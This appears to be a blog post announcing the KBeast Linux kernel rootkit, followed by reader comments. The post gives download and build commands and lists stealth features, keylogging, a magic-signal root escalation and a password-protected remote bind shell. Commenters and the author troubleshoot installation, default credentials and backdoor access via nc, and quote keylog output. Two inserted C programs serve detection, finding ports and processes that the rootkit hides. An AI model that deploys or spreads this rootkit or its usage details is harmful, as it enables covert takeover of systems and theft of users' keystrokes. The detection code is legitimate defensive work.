
31 Dec 2011

[UPDATE] KBeast – The New Kernel Rootkit

By IPSECS Admin. Posted in Exploitation

KBeast (Kernel Beast) is a new kernel rootkit based on a publicly known rootkit, modified to support kernels 2.6.16, 2.6.18, 2.6.32, and 2.6.35. It should actually work on kernels from 2.6.9 up to 2.6.35 or later, but our installer script is only written for 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Below are the quick steps for installing the beast:

  • wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
  • tar zxvf ipsecs-kbeast-v1.tar.gz
  • cd kbeast-v1/
  • modify config.h to meet your requirements; remember that _MAGIC_NAME_ must be an existing user with an sh/bash shell, and that the #define lines must keep their leading # (config.h is C, not a shell script)
  • In order to install on kernel 2.6.16 or 2.6.18, execute ./setup build 0
  • In order to install on kernel 2.6.32 or 2.6.35, execute ./setup build 1 (it should actually work on more recent kernels too)
  • In order to install on kernel 2.6.9, edit the .cc1 file to remove all sys_unlinkat()-related code, set the syscall table address manually, then execute ./setup build 0

Please note that the beast has been tested on, but is not limited to, kernels 2.6.9, 2.6.16, 2.6.18, 2.6.32 and 2.6.35 (i386 or x86_64). The features of this rootkit are:

  • Hiding this loadable kernel module
  • Hiding files/directories
  • Hiding processes (from ps, pstree, top, lsof)
  • Hiding sockets and connections (from netstat, lsof)
  • Keystroke logging to capture user activity
  • Anti-kill protection for its processes
  • Anti-remove protection for its files
  • Anti-delete protection for this loadable kernel module (it cannot be unloaded)
  • Local root escalation backdoor (triggered by default with kill -37 31337)
  • Remote bind backdoor (by default a password-protected shell on TCP port 13377, reached with nc/ncat), hidden by the kernel rootkit

During my tests with chkrootkit and rkhunter, this rootkit was not detected by either rootkit hunter. Note, as the comments below show, that process hiding is implemented by filtering the write() output of a fixed list of commands, so a tool that is not on that list can still reveal the hidden process. One limitation of the rootkit: you have to work out for yourself how to load it again when the server reboots. Believe me, that is an easy task; see the modification of an init script here as an example. Finally, you can download the kernel beast from core.ipsecs.com.

See Nightmare for Linux System Administrator, and Happy New Year 2012!
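The claim above that the backdoor port does not show up in netstat rests on the module's tcp4_seq_show hook (the function name h4x_tcp4_seq_show appears in the compile errors quoted in the comments below), which drops the hidden port from what the kernel prints into /proc/net/tcp. The kernel still refuses to bind() a port it already holds. The following program is an added example written for this page; it is not part of the original post or of the KBeast code. It reads /proc/net/tcp and /proc/net/tcp6 itself, asks bind() about every port, and reports any port the kernel holds that the listing omits. It assumes a Linux host, a hidden listener created without SO_REUSEADDR or SO_REUSEPORT, and a rootkit that does not also lie to bind(); the /proc/net/tcp sample inside it is constructed, not captured from a real host.

```c
/* Added example, not from the KBeast post or its author: cross-view check
 * for a TCP port hidden from /proc/net/tcp (which netstat reads, and which
 * a tcp4_seq_show hook filters). The kernel still refuses to bind() a port
 * it already holds, so "bind() fails with EADDRINUSE but the listing has no
 * socket on that port" is the tell. Assumptions: Linux, hidden listener not
 * created with SO_REUSEADDR/SO_REUSEPORT, rootkit does not hook bind(). */
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Collect the local port of every socket in /proc/net/tcp{,6} text, in any
 * state, because bind() refuses a port for all of them. The header line is
 * skipped since its first field is not numeric. Returns count (<= max). */
size_t parse_local_ports(const char *text, unsigned *out, size_t max)
{
    size_t n = 0;
    while (*text && n < max) {
        unsigned lport, rport, st;
        /* columns: sl local_address rem_address st ...; addresses are hex */
        if (sscanf(text, " %*d: %*[0-9A-Fa-f]:%4x %*[0-9A-Fa-f]:%4x %2x",
                   &lport, &rport, &st) == 3)
            out[n++] = lport;
        const char *nl = strchr(text, '\n');
        if (!nl) break;
        text = nl + 1;
    }
    return n;
}

/* Ask the kernel directly: 1 if 0.0.0.0:port is already bound (EADDRINUSE),
 * 0 if bind() succeeds, -1 on any other error (e.g. EACCES below 1024 when
 * not root). The probe socket is closed at once, so nothing is left behind. */
int port_in_use(unsigned port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    sa.sin_port = htons((uint16_t)port);
    int rc = bind(fd, (struct sockaddr *)&sa, sizeof sa);
    int err = errno;
    close(fd);
    if (rc == 0) return 0;
    return err == EADDRINUSE ? 1 : -1;
}

/* Cross-view: candidates that the listing lacks but the kernel says are
 * bound. in_use is a parameter so a fake oracle can drive the demo/test. */
size_t find_hidden_ports(const unsigned *listed, size_t nlisted,
                         const unsigned *candidates, size_t ncand,
                         int (*in_use)(unsigned), unsigned *hidden, size_t max)
{
    unsigned char seen[65536 / 8] = {0};
    for (size_t j = 0; j < nlisted; j++)
        if (listed[j] < 65536) seen[listed[j] / 8] |= (unsigned char)(1u << (listed[j] % 8));
    size_t nh = 0;
    for (size_t i = 0; i < ncand && nh < max; i++) {
        unsigned p = candidates[i];
        if (p == 0 || p >= 65536 || (seen[p / 8] & (1u << (p % 8)))) continue;
        if (in_use(p) == 1) hidden[nh++] = p;   /* bound, but not listed */
    }
    return nh;
}

/* Constructed sample (not captured from a host): sshd listening on 22, one
 * established connection to it, one TIME_WAIT socket on 50000, and no entry
 * for 13377, which is what a KBeast host with the default _HIDE_PORT_ shows. */
static const char SAMPLE_PROC_NET_TCP[] =
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0\n"
    "   1: 0100007F:0016 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 1235 1 0000000000000000 20 4 30 10 -1\n"
    "   2: 0100007F:C350 0100007F:0016 06 00000000:00000000 03:00001234 00000000     0        0 0 3 0000000000000000\n";

/* Fake kernel oracle for the sample: 22, 50000 and 13377 are bound. */
static int fake_in_use(unsigned port)
{
    return (port == 22 || port == 50000 || port == 13377) ? 1 : 0;
}

/* Run the check over the sample; returns hidden count, first hidden port in *first. */
size_t demo_hidden_count(unsigned *first)
{
    unsigned listed[16], hidden[8];
    size_t nl = parse_local_ports(SAMPLE_PROC_NET_TCP, listed, 16);
    const unsigned cand[] = {22, 80, 13377, 50000};
    size_t nh = find_hidden_ports(listed, nl, cand, 4, fake_in_use, hidden, 8);
    if (nh && first) *first = hidden[0];
    return nh;
}

static char *read_file(const char *path)
{
    FILE *f = fopen(path, "r");
    if (!f) return NULL;
    size_t cap = 1 << 16, len = 0, r;
    char *buf = malloc(cap);
    while (buf && (r = fread(buf + len, 1, cap - len - 1, f)) > 0) {
        len += r;
        if (len + 1 >= cap) { cap *= 2; buf = realloc(buf, cap); }
    }
    if (buf) buf[len] = '\0';
    fclose(f);
    return buf;
}

int main(void)
{
    static unsigned listed[65536], cand[65535], hidden[64];
    size_t nl = 0;
    const char *files[] = {"/proc/net/tcp", "/proc/net/tcp6"};
    for (size_t i = 0; i < 2; i++) {
        char *text = read_file(files[i]);
        if (text) { nl += parse_local_ports(text, listed + nl, 65536 - nl); free(text); }
    }
    for (unsigned p = 1; p <= 65535; p++) cand[p - 1] = p;
    size_t nh = find_hidden_ports(listed, nl, cand, 65535, port_in_use, hidden, 64);
    for (size_t i = 0; i < nh; i++)
        printf("port %u is bound but not listed in /proc/net/tcp{,6}\n", hidden[i]);
    printf("%zu listed port(s), %zu hidden\n", nl, nh);
    return nh ? 2 : 0;
}
```

Run it as root so that bind() can probe ports below 1024; an unprivileged run silently skips them (port_in_use returns -1 on EACCES). Each probe is a bind() on a throw-away socket, so the scan costs roughly 65k system calls and leaves no listener behind. A port reported here is strong evidence only as long as the module filters the /proc/net/tcp path and not bind() itself; a rootkit that hooks both views defeats this particular comparison.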


Responses to "[UPDATE] KBeast – The New Kernel Rootkit"

  1. fans Says:

    Installed smoothly on my Ubuntu 10.04, bro hehehe

  2. Jay Says:

    Hey dude,

    I tried running the setup script but I don't get the function checking the kernel headers:
    HEADER_DIR=`ls -l $1|awk -F \> '{print $2}'`

    So we have ls $1, set \> as the separator and print $2. Why $1, and where in the output of ls can you find ">" as a separator?

    Sorry, am I missing something?

  3. ipsec Says:

    Hi,
    It's because some kernel headers are installed as a symbolic link for /lib/modules/`uname -r`/build. The symbolic link and the target directory are separated by >.
    So which kernel version do you use, running on what Linux variant?

  4. Beverlee Lothian Says:

    It is highly helpful for me. Huge thumbs up for this blog post!

  5. Olivier Says:

    Thanks for this. Impressive.
    Just noticed a bug:
    once loaded, "ps auxw" runs as expected but "ps auxw|less" shows the backdoor server process:
    bin 1302 0.0 0.0 0 0 ? Ss 01:24 0:00 ./_h4x_bd

    (Debian squeeze).

    HTH.

  6. IPSECS Admin Says:

    Hi Olivier,
    Thanks for the feedback.
    *will work on it for the second version*
    Fixing process hiding and keylogging :)

  7. Euro Says:

    When will the second version be out?

  8. IPSECS Admin Says:

    There's no plan for when the release will be :-)

  9. Michael Says:

    Hi. I tested this on Debian 6 running 2.6.32 and it didn't work for me. I edited config.h and changed the user to one with /bin/bash access. I only put the username and nothing else. I then ran ./build 0 as root; it says it successfully installed it. I then tried connecting via SSH using port "13377" and the connection timed out. I also tried killing the PID "31337" from a local account and it didn't escalate privileges. I also kept this the same:

    /*
    Directory where your rootkit will be saved
    You have to use _H4X0R_ in your directory name
    No slash (/) at the end
    */
    #define _H4X_PATH_ "/usr/_h4x_"

    and when I try to cd into that directory it says it's not found. Am I doing something wrong?

  10. IPSECS Admin Says:

    Running ./setup build 0 must fail on 2.6.32. But you said that you succeeded? Anyway, for kernel 2.6.32 and 2.6.35 you should run ./setup build 1.

    With the default configuration, in order to escalate, kill PID 31337 with signal 37 (kill -37 31337).

  11. Michael Says:

    Hi, thanks for that, and yes, it didn't report that it was unsuccessful at all. Also, once it's installed, does it allow the attacker to SSH on port 13377 with the h4x3d password? Or do you use telnet?

  12. IPSECS Admin Says:

    Use nc or ncat :)

  13. TimL Says:

    Yeah, currently having the issue with process hiding.

    ps aux, ps auxw, etc. are showing it on this machine:
    Linux localhost 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux

    root@localhost:/usr/# ps aux|grep h4x
    root 1843 0.0 0.0 3456 772 pts/0 S+ 21:44 0:00 grep --color=auto h4x
    bin 31564 0.0 0.0 1680 60 ? Ss 19:48 0:00 ./_h4x_bd

  14. TimL Says:

    Adding onto my previous comment, I've noticed slight system instability since the install on another system
    (GNU/Linux 2.6.38-8-generic-pae i686)

    Normal SSH login results in the following:
    Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-generic-pae i686)

    * Documentation: https://help.ubuntu.com/

    System information as of Sun Feb 19 15:04:05 WIT 2012

    System load: 0.03 Processes: 82
    Usage of /home: 18.8% of 64.17GB Users logged in: 0
    Memory usage: 21% IP address for eth1: 202.****
    Swap usage: 0%

    Graph this data and manage this system at https://landscape.canonical.com/
    New release 'oneiric' available.
    Run 'do-release-upgrade' to upgrade to it.

    Last login: Sun Feb 19 15:01:29 2012 from 202.***
    root@gamma:~$ Connection to 202.*** closed.

    Where the Kbeast BD does just about the same:
    C:\>nc 202.** 13377

    [IPSECS ASCII-art banner; its spacing was lost in extraction]

    Password [displayed to screen]: password
    <>
    bash: no job control in this shell
    bin@gamma:/usr/_h4x_$

    (Stops responding here)

    Just figured I'd give some bug insight with as much system info as I'm able to obtain, in hopes that future versions might have more stability/fewer bugs.

  15. IPSECS Admin Says:

    Hi There,
    > ps aux|grep -> if ps is piped to another command, yes, it's detected, since hiding the process depends on the sys_write modification, which is only applied to some commands
    > I haven't tried it on 2.6.38, but there are certainly some memory leaks that should be fixed, which I found during my trial on busy servers.

    - Thx for the feedback

  16. TimL Says:

    Just to note, it showed with or without |grep on there, so it wasn't just the pipe leading to the other command.

    It was showing in general with any ps command; I just used grep to demonstrate that it was being shown, without thinking about the fact that it was being piped...
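The reply above explains that process hiding is done by modifying sys_write for a fixed list of commands. A program that reads /proc itself is not on that list, so its view of the PID space is unfiltered, and any PID it sees that ps omits is a suspect. The program below is an added example written for this page, not code from the post or from KBeast: it takes the PID list from ps (the tool's view) and from a readdir of /proc (the kernel's view), reports every PID the kernel has that ps did not print, and re-checks each suspect so that processes which merely started or exited between the two reads are not reported. It assumes a Linux /proc and a procps ps that accepts "ps -eo pid="; the sample ps output and PID list inside it are constructed, reusing PID 1302 from Olivier's comment as the hidden one.

```c
/* Added example, not code from the post or from KBeast: cross-view check
 * for a process hidden the way the reply above describes, by filtering the
 * write() output of ps/top/lsof. This program is not on that command list,
 * so its own readdir() of /proc is unfiltered; any PID it sees that ps does
 * not list is a suspect. Assumes Linux /proc and a procps ps that accepts
 * "ps -eo pid=" (one PID per line). The sample data below is constructed. */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Parse "one PID per line" text such as "ps -eo pid=" output; lines that do
 * not start with a digit (after blanks) are ignored. Returns count (<= max). */
size_t parse_pid_list(const char *text, int *out, size_t max)
{
    size_t n = 0;
    while (*text && n < max) {
        while (*text == ' ' || *text == '\t') text++;
        if (isdigit((unsigned char)*text)) out[n++] = (int)strtol(text, NULL, 10);
        const char *nl = strchr(text, '\n');
        if (!nl) break;
        text = nl + 1;
    }
    return n;
}

/* Tool's view: whatever ps manages to write() into our pipe. */
size_t list_ps_pids(int *out, size_t max)
{
    FILE *p = popen("ps -eo pid=", "r");
    if (!p) return 0;
    char line[64];
    size_t n = 0;
    while (n < max && fgets(line, sizeof line, p))
        n += parse_pid_list(line, out + n, 1);
    pclose(p);
    return n;
}

/* Kernel's view: numeric entries of /proc, read by this process itself. */
size_t list_proc_pids(int *out, size_t max)
{
    DIR *d = opendir("/proc");
    if (!d) return 0;
    size_t n = 0;
    struct dirent *e;
    while (n < max && (e = readdir(d)) != NULL)
        if (isdigit((unsigned char)e->d_name[0])) out[n++] = atoi(e->d_name);
    closedir(d);
    return n;
}

/* Pure diff: PIDs in kernel_view[] missing from tool_view[]. A bitmap sized
 * to the largest PID keeps it linear. Returns count written to out[]. */
size_t pids_hidden_from_tool(const int *kernel_view, size_t nk,
                             const int *tool_view, size_t nt, int *out, size_t max)
{
    int limit = 0;
    for (size_t i = 0; i < nk; i++) if (kernel_view[i] > limit) limit = kernel_view[i];
    for (size_t i = 0; i < nt; i++) if (tool_view[i] > limit) limit = tool_view[i];
    unsigned char *seen = calloc((size_t)limit / 8 + 1, 1);
    if (!seen) return 0;
    for (size_t i = 0; i < nt; i++)
        if (tool_view[i] > 0) seen[tool_view[i] / 8] |= (unsigned char)(1u << (tool_view[i] % 8));
    size_t n = 0;
    for (size_t i = 0; i < nk && n < max; i++) {
        int p = kernel_view[i];
        if (p > 0 && !(seen[p / 8] & (1u << (p % 8)))) out[n++] = p;
    }
    free(seen);
    return n;
}

/* Constructed sample (not captured): ps output on a host where the backdoor
 * process, PID 1302 as in the comment above, is filtered out, next to the
 * PIDs that a direct /proc listing returned at the same moment. */
static const char SAMPLE_PS_OUTPUT[] = "    1\n    2\n 1843\n";
static const int SAMPLE_PROC_PIDS[] = {1, 2, 1302, 1843};

/* Run the diff on the sample; returns hidden count, first hidden PID in *first. */
size_t demo_hidden_pid(int *first)
{
    int ps_pids[8], hidden[8];
    size_t nps = parse_pid_list(SAMPLE_PS_OUTPUT, ps_pids, 8);
    size_t nh = pids_hidden_from_tool(SAMPLE_PROC_PIDS, 4, ps_pids, nps, hidden, 8);
    if (nh && first) *first = hidden[0];
    return nh;
}

int main(void)
{
    enum { MAXP = 1 << 20 };
    int *tool = malloc(MAXP * sizeof *tool), *kern = malloc(MAXP * sizeof *kern);
    int hidden[256], again, reported = 0;
    if (!tool || !kern) return 1;
    /* Tool's view first, then the kernel's: a process that exits in between
     * is never a suspect; one that starts in between is cleared by the
     * re-check below. */
    size_t nt = list_ps_pids(tool, MAXP);
    size_t nk = list_proc_pids(kern, MAXP);
    size_t nh = pids_hidden_from_tool(kern, nk, tool, nt, hidden, 256);
    for (size_t i = 0; i < nh; i++) {
        char path[64];
        struct stat st;
        snprintf(path, sizeof path, "/proc/%d", hidden[i]);
        if (stat(path, &st) != 0) continue;                 /* already gone */
        nt = list_ps_pids(tool, MAXP);
        if (pids_hidden_from_tool(&hidden[i], 1, tool, nt, &again, 1) == 0) continue;
        printf("PID %d exists in /proc but ps does not list it\n", hidden[i]);
        reported++;
    }
    printf("%zu PIDs in /proc, %zu from ps, %d hidden\n", nk, nt, reported);
    free(tool); free(kern);
    return reported ? 2 : 0;
}
```

The check reports nothing when hiding does not work, which is exactly what Olivier and TimL saw: if ps already prints the backdoor process, the two views agree. It also reports nothing against a rootkit that filters the /proc directory listing itself, because then the "kernel view" is filtered too; that is the general limit of cross-view detection, and the reason to take the second view from something the rootkit was not written to expect.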

  17. TimL Says:

    Another suggestion: you should add to the keylogging the ability to log the contents input into commands like "su"; currently it doesn't seem to do so.

    [20/02/2012-11:16:27] - [UID = 505 ] bash > su
    [20/02/2012-11:16:32] - [UID = 505 ] bash > su
    [20/02/2012-11:16:38] - [UID = 505 ] bash > su
    [20/02/2012-11:16:46] - [UID = 505 ] bash > su
    [20/02/2012-11:16:53] - [UID = 505 ] bash > su
    [20/02/2012-11:16:59] - [UID = 505 ] bash > su
    [20/02/2012-11:27:28] - [UID = 505 ] bash > exit

    Sure, if you were to SSH into another system from the one you're on, it would log the details entered (I've tested that and it works); however, while using "su" on the local machine, I guess whatever functionality it uses to detect the keys pressed, the keylogging functionality isn't hooking that area of the kernel.

    Btw, it's still some great work, more than I could've accomplished myself to be honest, and I love that you're trying to give it compatibility with multiple kernel versions instead of relying on the host machine being on a set kernel.

  18. jeandez Says:

    Hi !!!
    I'm trying to install kbeast for testing. I'm editing the config.h file but I don't understand the aim of this step:
    /* Magic signal & pid for local escalation */
    #define _MAGIC_SIG_ 37 //Kill signal
    #define _MAGIC_PID_ 31337 //kill this pid

    Also, can you help me use kbeast remotely?
    I created a user with the useradd command in order to use it as _MAGIC_NAME_; is that correct?
    Once config.h is edited, what do I have to do to get kbeast running?
    Thank you!!

  19. Rootkit 32 | Sellmyname Says:

    [...] IT Security – [UPDATE] KBeast – The New Kernel Rootkit [...]

  20. IPSECS Admin Says:

    Hi, MAGIC_SIGNAL & MAGIC_PID are for escalating to root, e.g. kill -37 31337. With the default install it should be possible to access it remotely using nc/ncat to port 13377. It's better for you to use a currently existing username.

  21. jeandez Says:

    I use Fedora 16 as a remote host and try to connect to port 13377 on my Ubuntu (kernel 2.6.32-34) with netcat, but it doesn't work.
    This is what I get: [root@bi kouad]#nc -z 192.168.1.2 13377
    [root@bi kouad]#
    192.168.1.2 is my Ubuntu IP.

    Please look at my config.h file and tell me if there is something that goes wrong:
    /*Don't change this line*/
    define TRUE 1
    define FALSE 0

    /*
    Enable keylog probably makes the system unstable
    But worth to be tried
    */
    #define _KEYLOG_ TRUE

    /*Define your module & network daemon name*/
    define KBEAST "kbeast"

    /*
    All files, dirs, process will be hidden
    Protected from deletion & being killed
    */
    #define _H4X0R_ "_h4x_"

    /*
    Directory where your rootkit will be saved
    You have to use _H4X0R_ in your directory name
    No slash (/) at the end
    */
    define _H4X_PATH_ "/usr/_h4x_/_H4XOR_DEZ"

    /*
    File to save key logged data
    */
    #define _LOGFILE_ "acctlog"

    /*
    This port will be hidded from netstat
    */
    define _HIDE_PORT_ 13377

    /*
    Password for remote access
    */
    define _RPASSWORD_ "h4x3d"
    define _MAGIC_NAME_ "rootkit"
    /*
    Magic signal & pid for local escalation
    */
    define _MAGIC_SIG_ 37 //kill signal
    define _MAGIC_PID_ 31337 //kill this pid

    //rootkit is a user that I added with the useradd command

    Also, when I did ./setup build I got:
    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : [OK]
    Compiling Kernel Module : [OK]
    Compiling Network Daemon File : [NOT OK] // I think there is a problem there.

    Thank you for your help!!

  23. jeandez Says:

    Now I get a problem with compiling the kernel module:

    compiling kernel Module : [not OK]

  24. jeandez Says:

    Today I tried to install kbeast on Ubuntu 10.10 (kernel 2.6.35); I got this when running ./setup build 1:

    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : [OK]
    Compiling Kernel Module : [NOT OK] //can you help me !!!

    I got the same thing with my older Ubuntu (kernel 2.6.32-34).
    What happened???? Because the first time I installed kbeast (on my Ubuntu kernel 2.6.32) I got 'compiling kernel Module : [ok]';
    perhaps after updating it (but the kernel still remains 2.6.32) a problem occurred.
    Thank you!!

  25. anonymous Says:

    Jeandez,
    Can you go to the H4X PATH directory, type 'make' and paste the result here?

  26. jeandez Says:

    OK, this is what I got when doing a "make" in H4X PATH:

    kangaman@bi-laptop:/usr/_h4x_/_H4X0R_dez$ make

    make -C /lib/modules/2.6.32-34-generic/build M=/usr/_h4x_/_H4X0R_dez modules
    make[1]: Entering directory `/usr/src/linux-headers-2.6.32-34-generic'
    CC [M] /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o
    In file included from /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:34:
    /usr/_h4x_/_H4X0R_dez/config.h:8: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘TRUE’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: warning: ‘struct vtm’ declared inside parameter list
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: warning: its scope is only this definition or declaration, which is probably not what you want
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:107: warning: ‘struct vtm’ declared inside parameter list
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:107: error: conflicting types for ‘epoch2time’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: note: previous declaration of ‘epoch2time’ was here
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘epoch2time’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:130: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:132: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:133: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:141: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:142: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:148: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:149: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘get_time’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:158: error: storage size of ‘tm’ isn’t known
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:158: warning: unused variable ‘tm’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘log_to_file’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: ‘_H4X_PATH_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: (Each undeclared identifier is reported only once
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: for each function it appears in.)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_tcp4_seq_show’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:221: error: ‘_HIDE_PORT_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_read’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:242: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_write’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:479: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_unlink’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:570: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_rmdir’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:585: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_unlinkat’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:599: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_rename’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:615: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_open’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:632: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_kill’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:649: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:653: error: ‘_MAGIC_SIG_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:653: error: ‘_MAGIC_PID_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_delete_module’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:665: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘init’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:679: warning: ISO C90 forbids mixed declarations and code
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:684: error: ‘TRUE’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:686: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:689: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:694: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:695: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:699: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:700: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:701: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:702: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:703: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:704: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:705: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:706: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:707: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:708: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:709: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:710: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:711: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:712: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘exit’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:734: error: ‘TRUE’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:735: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:737: warning: assignment makes integer from pointer without a cast
